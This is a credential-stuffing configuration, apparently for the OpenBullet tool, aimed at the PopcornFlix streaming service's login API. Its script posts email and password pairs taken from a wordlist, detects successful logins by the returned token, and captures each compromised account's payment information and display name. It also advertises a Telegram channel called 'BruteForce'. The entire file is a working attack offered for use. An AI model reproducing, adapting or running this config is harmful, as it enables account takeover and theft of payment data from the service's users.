[SETTINGS]
{
  "Name": "PopCornFlix",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-09-14T01:31:23.2284947+04:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.unreel.me/v2/me/auth/login?__site=popcornflix&__source=web" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"site\":\"popcornflix\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.unreel.me" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 98" 
  HEADER "Pragma: no-cache" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 
  HEADER "Origin: https://www.popcornflix.com" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.popcornflix.com/login" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect email or password" 
  KEYCHAIN Success OR 
    KEY "token" 

#PaymentInfo PARSE "<SOURCE>" JSON "creatorPaymentInfo" CreateEmpty=FALSE -> CAP "PaymentInfo" 

#displayName PARSE "<SOURCE>" JSON "displayName" CreateEmpty=FALSE -> CAP "displayName" 

#CC FUNCTION Constant " T.me/BruteForce " -> CAP "Telegram Channel:" 

